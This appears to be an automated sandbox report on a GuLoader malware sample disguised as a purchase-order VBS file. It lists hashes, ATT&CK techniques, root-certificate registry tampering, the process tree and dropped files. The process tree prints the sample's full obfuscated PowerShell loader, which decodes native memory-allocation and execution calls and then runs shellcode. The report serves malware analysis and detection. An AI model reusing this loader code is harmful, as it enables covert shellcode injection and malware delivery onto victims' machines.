guloader | 4a184a5dba434c3111b51a7ebb61be06ca8673c6f01e5ba73b972d1b49748f9a

General

Target

JEIL-INT_PO#963529965-JEIL96002.vbs
Size

309KB
MD5

617a92eb190683ee6358e54f4cefa934
SHA1

bae170e5e8bbc06c4ad14fa2af1178e9f0792b29
SHA256

4a184a5dba434c3111b51a7ebb61be06ca8673c6f01e5ba73b972d1b49748f9a
SHA512

7fee5e8004b74ba3d2830e1198e7d9326e2de6af3fabc45b77010abf0bbee44326f9e5a845d7edff90326be677b185a94b764001eae34503092ee65cc0f8638b
SSDEEP

6144:Qo+zunMI9l6SnFw7OOeyxa3OE/h63vks0Nqp7xFD7SZtLGA6u:Ql6MID3+7dbxYOWVtqp7nLnu

Score

10^/10

guloader downloader

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Blocklisted process makes network request 1 IoCs

Processes:

WScript.exe

flow pid process

2 2024 WScript.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

flow	pid	process
2	2024	WScript.exe

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

WScript.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	WScript.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

588 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 588 powershell.exe

pid	process
588	powershell.exe

description	pid	process
Token: SeDebugPrivilege	588	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

WScript.exepowershell.execsc.exe

description	pid	process	target process
PID 2024 wrote to memory of 588	2024	WScript.exe	powershell.exe
PID 2024 wrote to memory of 588	2024	WScript.exe	powershell.exe
PID 2024 wrote to memory of 588	2024	WScript.exe	powershell.exe
PID 2024 wrote to memory of 588	2024	WScript.exe	powershell.exe
PID 588 wrote to memory of 1560	588	powershell.exe	csc.exe
PID 588 wrote to memory of 1560	588	powershell.exe	csc.exe
PID 588 wrote to memory of 1560	588	powershell.exe	csc.exe
PID 588 wrote to memory of 1560	588	powershell.exe	csc.exe
PID 1560 wrote to memory of 1884	1560	csc.exe	cvtres.exe
PID 1560 wrote to memory of 1884	1560	csc.exe	cvtres.exe
PID 1560 wrote to memory of 1884	1560	csc.exe	cvtres.exe
PID 1560 wrote to memory of 1884	1560	csc.exe	cvtres.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\JEIL-INT_PO#963529965-JEIL96002.vbs"
1⤵
- Blocklisted process makes network request
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:2024

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$Aftensbord = """DipicAStormdPeatmdChias-SlagtTHoolyyTungmpHemopeEkspe Unapp-kolumTInundyVindepSuperefibdoDBrneheSabbafCitraiHoflenUlriciPriontfjerniDisdioEjectnKrelo Domin'BoejeuDecahsHieraiDodecnBengtgaborr ElskeSBletryDeporsSexfitAvlsgeFastemDamag;BalleuBefliscalifiLehnanMiljsgAeria BagstSSpeedyomtvisSkriftHkankeGoblimClock.MyeloRPegmauCrayfnteleftOpvariNettlmHematebsnin.Cem HIpointnEkspotSoegeeLaanermosleoKentapTuberSPixyietracerTankpvKim OiOhs UcSavfieDiskosRefor;BenzipEarthuBjeskbInfralNonpeiGranscZoril FlyvesLysegtAurelaElfentDagspiHvalpcTipto UnrifcGagerlCustoaUnfilsRuse sBozin GloseFUnpreeMultieHawklbBverllKontreAsminmAlpebiUnharnLossedRidehekommudNongllNusseyMakro1Gager{Minim[IdeenDRumfolRheinlPseudISouthmresolpCeratoFinalrDiplotNgtes(Armer`"""henveACaronDHamhuVSubtrAManerPzolaiICruel3Axino2Urome.hammeDFantaLFejlmLLutan`"""regen)Opmaa]NoncapAbilauMagnebMarkelHindriRefercTryll wingpsKrigstGodteaBeldrtLaskeiLinetcBodem FlskeeBssesxAnalytsporoeSubjerNonrenindla ReseriTillgnarctitNonio EldorRBeefyeCrowhpPonceoIncesrlappetHovedESemifvPropreUdenrnBulretPrgti(ClapbiKlodsnDeslitLecan venedDEnureoBipenmHerresConfo,subdiiPredenRensetTauto JuvenQviruluAnsttaDissidLejef,TolusiVicomnSkyldtEmbod SolbeOSmitsrLaureddifferMerteeMonogbbesta,LymphiJodlenBebattCuerd LaminTRemplrForefuByggetFlusttObfus,EconoiKvarknWorkdtCivil HarveGchitanAbohmoBoxinmMonilePhraszHeata,SandbiDeismnElekttIntro BymilBKlandrReprsoPersoaTkker,PerruiHotdonFragttRelam KosteHUnchaaBortfsAdmirsHerre,SkunkiKilolnBiogrtSuper ventidCopraeCoscisSkrifcWhoseeAine nShlep,UdbydiOffernIntimtProba PrecePHvedorUnwifeUsetesBarbiyFlurr)Mindr;Samfu[RomanDObstrlFritulNidioIPortimDefacpCardioStrairRaavatXylit(Spekt`"""NonadkSler eAnparrStampnSugarePackalUnoff3Opsta2Hundr`"""Dugge)Reaga]IglespJaspeuegetrbBakselDejkriKareecPensi ProbasHenrytRanunaIndultHuahuiDiskecSenge EidolefjernxStvletEcdyseSkiagrUspornChapb UrddeiMelannUncurtPara SvejsGNonroeGrovetSalamPAfskrrhusmaoPleascClickeChablsGardesSkalaHTilsvekugelaUnbenpInter(Gamme)Udfle;Salvn[ResinDStykklNewsplUntriIShakemKroplpVrdiboSugg rPoseftStre (Accen`"""BorgmgSkamrdparkeiincon3Mande2Nonre`"""Black)Fossi]KnottpRigssuAngiobKommalConfiiTaletcTjred RabulsProprtBrandaPetritSkaldiUdflycBipro IndraeUdsprxErotitCommoeTimorrForrenFishb ChromiBehovnindektOliea udbydAStudenDokumiTurbomSuggeaFidustTilhreThackPudsknaBankelUdvikeskdsktFemretTrampeOverv(OldiniPlacanFljettDivin CyanoSPastatDiopteTire aTrstemGummi,BogwoiTilbanUdspetHersh ElymuVbywarePolysjLnindtTnknirQuina,AssociGuidenBestitLibra HvileDTidseaKogesaSepterSanit,CrossiWerelnIsobotNgapi SkrueMStadseHypercMesmekBrnefeHaand)Ophio;Diges[ValgoDSvejslDeterlSammeIAdmixmKlbespsalveoProlorSkumptExtra(Cresc`"""GrusvsTroldhbestaeDepaylRetailFoldn3Glass2Drmme.SammedRoumelBjerglChili`"""Forso)Rundi]RoomlpCeylouGerlubTellilKiroviOverecKasse OverssSovehtTabasaTyphotUnbewiReharcudkrn ModiseKronvxUnfedtstrageEnterrKype nSkygg DemetiKursunOpmagtSlagt BesvrDUnderuUnexapTrskolSpriniAspidcFlumpaCensutSpyeneFiskeINuanccKonomoRehumnInten(NomogiSprecnMistitPassi SsygeTCottehDiveruHomofmCajanpDelegsFusio,RevneiQuiltnWalistCurts Xdiv ISurennStadsdBywortNatur)Matte;Julia[GruppDBidsklSsterlCantlIPlurimAttatpCrevioAmlonrRouvitFiske(piein`"""ReinewAmidaiParacnUndermFlakkmArefa.AnstrdNonsclDgncelTurd `"""Phore)Gya S]TantapKuldsuNrme bPoopslSignaibougacVejer ekstrsBrtsetToledaSubsitChanciProplcperth SporteLovfoxSanemtSkoleeSautrrDutchnGallo ArbejiScatunCoenatDemic ValgfDTopolrBetorvOmhegGMedleewitchtFngslMDispuoBumledautofuBiblilPosteeSmkkeHFugtiaForbrnCherndTndinlResumePodni(DomhuiUnscanAsymptNiche KadmipStileaAfskyrForpl)Overv;samme[radioDAuto lKvalelOligoIGradmmUnperpSterioAnnotrureditDuckh(Hersk`"""HorseiLaevomFyrmemHarne3Abwat2Centr.UndsedJejunlSejlblErkla`"""Skilr)Bott ]TurkipCiviluYvor bMirthlUddifiTaksacAffod AppoisStenitcongoaNyanltPythoiLooincSpise HuaraeIndukxRappetTvangeArbejrUnsopnSurd PuraqiMedicnVoksetCelsi ProdeIFiligmStartmFoedeITheresFordpIKronoMHesteEScutt(TrireiMystenOutcatJuare forsgbLystbePressnUdsle)Compa;Veksl[Whyo DRumralSjaellSprngIFriermHellipUngreoTorsirDislotPasse(Butan`"""TrdepkSolfaePlastrAntndnAmbraeTopollSvrte3Forso2Drvle`"""omsvr)Biham]RouvipToetauCondebDistrlUnloviKonficArcoc IndoksSprogtPristaBaptitHypnoiKeglecAfhol PlanieAporixUnpretbamseeCermerSchulntilba ForskiSlutsnOrdhotTatar RelicREvergeHnse athirtdTortaCAffecoServanPentasFruitoSommelBiblieGraadOidolouOpfyltSkedepSlibeuOpholtFredsCPolluhJtteraUnacurSvejtaRegiocNymantUncroeFolkerColle(isantiMedeanConcetFordj PrsidMSmregaOutmetStilltLandseFanat,ButteiTremonbogtrtSubti UdraaSPrintkFls CeMentilriddeeFyrst,UnderiForesnTriaztTrans SubfiDEneheaBraurnsquee,JustliVitupnStyritAfflu AndesARicharPrcisaMidte,DrysaiGoodynelguitTelef TilliDConsprSarbiaLutregUndernVmmel7Narko7mixer)Skift;Kilde[SprogDnonraltoni lKamelIFraadmPromipPalomoChaetrFstemtsuppo(Halvp`"""StorbkAntaleEdifyrelbilnproseePolymlLapla3Plann2Acrol`"""Diagr)Bogtr]PhilopRekonuEpichbGravslApyreidispecForbo MbytesNutidtEphahaFigurtNoncaiSkridcalfri DisapeTransxOperotKompeeVidebrbrinknVersi AllociMykolnKathatBronz BlrenlSpndewSynsprForbiiTigritStvkoeDiver(FlybliPiretnopspltUnkno FiskeecellemSmaapietnol,SporeiBauxinAdapttSuper AmphiSmobilpTilfguOpmanlProfi,StankiImpronDykketPugge AtokaTOdrenrTrekoeMegah)Ventr;Brokf[DialoDBhutaljournlApicaISmaabmUhyrepHerlioBebudrStmagtPyrol(Polos`"""PosteASenioDTitanVTidsnARevolPBydelINonma3Forbe2Absor.UnderDLavfrLFarveLExege`"""Toluo)Archd]LucarpIndtruChelybIntimlPositiPhalacBurme RarefsMyrmitGrandaBeundtNonfriStubbcRafle DockieKrillxHm TatObsteeFuelerFremlnSkrup SpruniCentrnrs untQuiri FastlBUnnataRododcuntarkUreeluArbejpBulliEFeathvNoncheStadsnPrethtTreasLMordeoKatargKaktu(AnnemiDepronFunkttforan ScrimlGenhueTocogjChoroeBarskvOprrsrInimi,TouchiBloktnMultitMytol ArshiSReachibremsltekst)Frisk;Brain[DiscoDStrknlStilalFinanIobtusmGunvapbrndeoJaevnrlienotRetou(Overe`"""SurrogDiaphdUnaceiSatyr3Siris2Major`"""Speed)Vocal]ExanipCleisuBundtbPyraglAquariVire cPlagi AntrfsResoctRelataJaniatUdvaniFloreckaren Ena SeImperxEligltPantherkefjrLuksunKnage ManneiOdontnCardbtKnapp Rua AGKonsteFallatBrandEDeplenFortihOphioMReciteScoputTredjastilfFVita iVineglTinkreDrearPBemiraMilielVaskeeBordetGensttHobbleSubteEJauncnFejt tSkaanrGravliFremdeRetsisBrunb(SammeiGantlnPolybtUdenr Bags UKlitonCircufForgiuScorp,CemeniBroadnAdoletLocki FeudaPLydbirOverfoHumansUninteBeliqcoccid,ShinniFormanPlanetEneto ErrhiCUdgjolDokumeUhvisabromb1smuld7Aerom6Harle)Resid;Implo[KlyngDFornelchlamlcovesIDicotmPreadpLowanoNonstrAndrotVaett(luftf`"""cortegKnbesdkrystiPlana3Spjts2Krypt`"""Serve)zingi]BarnapPromiuSkrutbMultrlKontriYttercHogpe VandssUdrulthypsoaSubcatCurbsiCallicEptat TheateSad FxValdrtKoordeunionrKongenSymbo Ens DiDiskvnStivetFrdig SamleEHoldbnMagpiuGivenmImbolFTufstoRekonnSpiretScandFraadiaSammemubrugiUpaavlDuenniSammeePedalsUnforEKammexCentr(AffroiKvrulnPrountPleur interFQerneaTrofedmennedCatopeFlore,PediciTronangaoletPersu WhinnIFrkkenEctomsderma,TeskeiUndernDicaltCance ReforAMasonxSkrivpChamfiFiske,PaddiiSubprnBanantKarto NeocyMDenneoUnivatProtooDistr2Selek0Jesui4Omrin,ReconiBalusnBiozotWhaup BlackNStyrksUdlbskForty)Ameri;Turid[TjavsDangiolBernalRevolIVidermWaterpAfasioEnganrlollitRotte(Uklog`"""KindekLigedeChaptrWallfnWaar ePubeslhenre3Mater2sparo`"""Prese)antis]SkabipUncoauNiveabBegynlSodaciShrovcAfbig SqualsUndistBlndeaTogfrtUdforispadecfluor VrdigeEscapxMagnetKommueUnarrrInvinnKrest FlikviSubinnIndvitStamf CigarVBlousiSonnerSengetDisheuUnembaAndrolMonotAKildelApololInteroAyatocZooxa(QuateiMegannCommutmikro CuvievSelvm1Evert,AflggiBraavnAndeltOvers ReservImpar2Marys,PelomiStensnLejektHindk AgativPorai3dunha,FeedbiCartonStrigtPrimr BesvavRaast4Afste)Repen;Brnes[MenneDdiffilTendelElegiIStyltmKamgrpCateroRandtrLiis tToilw(Panic`"""MinuekAskeoeAfskrrRandrnideeleRadiklarcha3Gramm2Genne`"""Formf)Lighe]SexbopWaddyuStbefbSpulelBrandiForbrctrans BugtasAdfrdtbttefaUdmattSkimliChemicRecur squaleLnudbxGunvetpentaeUplifrTeetonauscu ClassiUdrusnschiztUrenl PramsCFoldnoBiritmNoodlpEichbaKanjarForsteMatinFHstfaiBortrlMireleBaandTGenneiOphavmScandeStrbe(KrampiLettrnPuckftRelik SlugwRFremkeTabelvPob Bearchcnthiaz,DoubtiLungenDispetCinna FodbosFucosyFeriegkkkenefilla)Polyp;melod[DispuDRivallPriselEfterIUnpromTruanpUforsoPromprRumnetTrain(Renor`"""FordakStempeAlichranlignStjaaeantarlDasyu3Posie2Ravne`"""Meldr)Hette]ThesmpTransuAktr bPseudlVrangiDiskocPhoen SyklusNverntDelegaBeroetKuskeiGenlscSvbet BlesseCrossxBldgjtSvarpeCrenerUnrecnPolit UddriISpottnCigartAllogPnikketIndtrrVandh VetivEAnsvanEkstruEurodmTvekaSSmallyTjhussAtometOffereStrudmMekanLForbroaleurcKumulareverlDrumleSutorsKarikANoncr(KyooduskrppiBefalnDkfretTheol KammevBlock1Sewer,FratriPseudnLatyrtLever SukkevPatri2Strbe)Sygef;Konst}Allia'Nusse;Bedri`$FaldeFMetreePleaseterpebdesallDulcaeBisonmVgtppiwritanSeamadRotereInspidSammelSkibsyIdioc3Bengl=Whelp[rhyncFOppugeGnisteHandhbKlanglMetaceChiromKnevriOplsnnTartadForkleDrunadEfterlSubefyCysto1Resip]Udske:Tidss:IllumVCommoiJomsvrUnendtjakkeuSkalaaBortslStammAIsthmlConstlconseoChoricTrifi(Swosh0Gener,Malap1Belbs0Erlgg4Finnj8Sekti5Kapri7Retro6Dogbe,Tossu1Strom2Avlen2Megui8Hirsl8hvile,Forel6Bryst4Gothi)Under;Huppo`$RdgarFSkindjstandeTeamlrAfterdoverseSynthpBeskyaSurderunsymtvasifeNoaornOverm=Deput(UdfreGWittaeGenertLiger-SuperILighttViljeeFarvemAardvPFinanrBegynoTidsgpSkroteunretrOdoritIndteyBemge Anakr-OvermPUndonaPintatArbejhAppli Still'sammeHProgrKProfeCAxhamUKnude:Filtp\CharaTStinnaDeadetSlagtaRuptumKaleniSimilsKonfi\AngriUModpadboatseAnatonNrklevForherWagonkBogbi'Cordi)Melle.MotorJSprinoKnudehOverbnCyathnHeldeyBront;Polli`$UdmatURetsldSimpssPreselSideseDdboltKrlhatKapiteGodlilMedspsUdateeLysforSminknFirsieSemib Brach=Ikker Derma[TheomSarabeyNildasAndrotCheireCrepemSkrkb.AmbulCForsooafdaenHemoavFemeteInaktrStttetRefle]Bisol:Overf:BlindFFjortrAfhjeoSequemPodicBAlleraBlikfsDjerieSheep6Unbef4LeptoSTalestSubjertopliiGarrunAlrungperij(Zoosc`$GenneFFrysejAbkhaeAeolirSynapdBastneAuchepFootsazephyrDelattArbejeZelannRtebl)Drmme;Slofs[dugenSChteaySansesSapajtNedkueStartmBrneh.KrystRPreimuOsseonAntiptTransiAfsvimdeviaeUnper.NonobILevannUncentRomaneAgtsorDominoTerpepSnderSUdbldeVokserBroadvKortsiMottocSekreeIndbisSkibi.TripoMTvillaConfrrBismasFondshSanctaCoffelThing]Spurw:myal :PatruCUdledoKjortpKrabayTacit(Pletf`$GdninUMagisdfamilsFlounlSigmoeNuanctUnrrotSatyreLukkelIrakisMisguewastrrUninsnConfeeTrovr,Siric lease0Uddan,Ablue Imagi Squir`$RedecFGrendeTagalePlusgbDeklalQualieAcridmAntikiMotornFlus dYtrineUnabddBallolFalskyUdspa3Grund,Senio Discr`$piperUCompldSurmusStngnlBalmieMnjemtlagertsvedeeGiftelClarasEmboiePlacarstudinAggreenetvr.FagmscUnderomuseuuSedimnSupertNomot)Pikar;patri[MethaFSpiseeBibioeLykkabNonfulEpipheUstadmHuskaiCountnSkovpdSvingeKartodHavnelNatioyambul1Paahn]Bjlde:Linco:LblteEUncatnleptoustenomKinesSFrekvyPajarsFordutPrmieemoralmTrilaLGolanoSamancHalveaBilfalAgroseunslisChatlAmasha(Duehg`$FagklFLflaseSkideeFleysbMillilDiscoeForsgmUnderiDiskrnEremidBlackeFeltsdAbuselSpadeyUdvid3Kendi,Denti Flads0Split)Gstep;""";Function Feeblemindedly4 { param([String]$Internaliser2); For($Programstrukturer=5; $Programstrukturer -lt $Internaliser2.Length-1; $Programstrukturer+=(5+1)){ $Feeblemindedly5 = $Internaliser2.'Substring'($Programstrukturer, 1); $procrastinates = $procrastinates + $Feeblemindedly5; } $procrastinates;}$Internaliser0 = Feeblemindedly4 'RhyptISemieEFremtXSport ';$Internaliser1= Feeblemindedly4 $Aftensbord;&$Internaliser0 $Internaliser1;;"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:588

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qpro9uv1.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:1560

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES51CA.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC51C9.tmp"
4⤵
PID:1884

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Install Root Certificate

Modify Registry

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES51CA.tmp
Filesize
1KB

MD5
13355523c17d074c904ff6113c2b7d06

SHA1
415e8de7a704a8ff99b8a838f90cb4c992d501e5

SHA256
cd576cae52bcc3bcbf3cbeb30a76fbcab1b4007e775e9054a5cc1d66ae273e30

SHA512
56a86423521962767cb8aeb342e2f92b01073c98f33f1d221176ebd60a4aa9a79651834341fe08af3f1436683aea445441e2592849d05df35fa7ff7d31fbedd8

Download Submit
C:\Users\Admin\AppData\Local\Temp\qpro9uv1.dll
Filesize
4KB

MD5
6531a66cec8491e42917def2efc2eeda

SHA1
f15c61bd3a51676a2af5f461ba6fe41f20045ae3

SHA256
d87e5422ae754d051a67654ad84a24ea4bbc7b855a04f46539bc7768781b79a1

SHA512
a2d80f92bda54f89a9004afdfb54fc8e2922c192cf3d600b884af8a2ceef5224a8af848b295f27056ee6ac0305ae22024542a3804b55b32bc736a7ee75aa6278

Download Submit
C:\Users\Admin\AppData\Local\Temp\qpro9uv1.pdb
Filesize
7KB

MD5
0d1820a5c3d0b351f163ddd49486a0ae

SHA1
b43fab8d0f1784cdabb170ce1856e7802a55d7be

SHA256
bc6022913112a7b5594e3bc0306e38105d65639d8a17908152479ba4dde74968

SHA512
75010c9d6edc6230af5a77f0f498d21eaf24d1c807d4dc5953d3dbb86269a23087fb09a5703fd396ff623ed560fa10831b190d3b018bc831f11162e82aa282ea

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC51C9.tmp
Filesize
652B

MD5
1f8cc71da2e00eeae819f967ff734d55

SHA1
30a2056cf43d9ab58061667d369e281a13e9328b

SHA256
6e497674c6141f89817e2107ba01da4272b50245df025d7b648cfc650dd6672e

SHA512
4322e117aaa7489b8da7d18462c7676c107ff1cb89a965b261616e8c457ee7eeaf8b7a9840d22259238ec9d36940001a5f8e1fd13abe026e9153469a5dd2e4cc

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qpro9uv1.0.cs
Filesize
1KB

MD5
d630b77d85db65e83c0d38d5812b7c28

SHA1
e0c2682dc9cdd51ef06f5b40a97c46d5d274005c

SHA256
6c2a3bc02238cb820747541edffaab7fe82816573cd54b29a257db3691895dd4

SHA512
a9cb80950a9061b14375ca5fd6c48e36c74c3372811c8f79b4ab7722316bc408f2660f45bd0947b75b4fa1a943668b6d9a667f00ffae2c4cfa907430b0440936

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qpro9uv1.cmdline
Filesize
309B

MD5
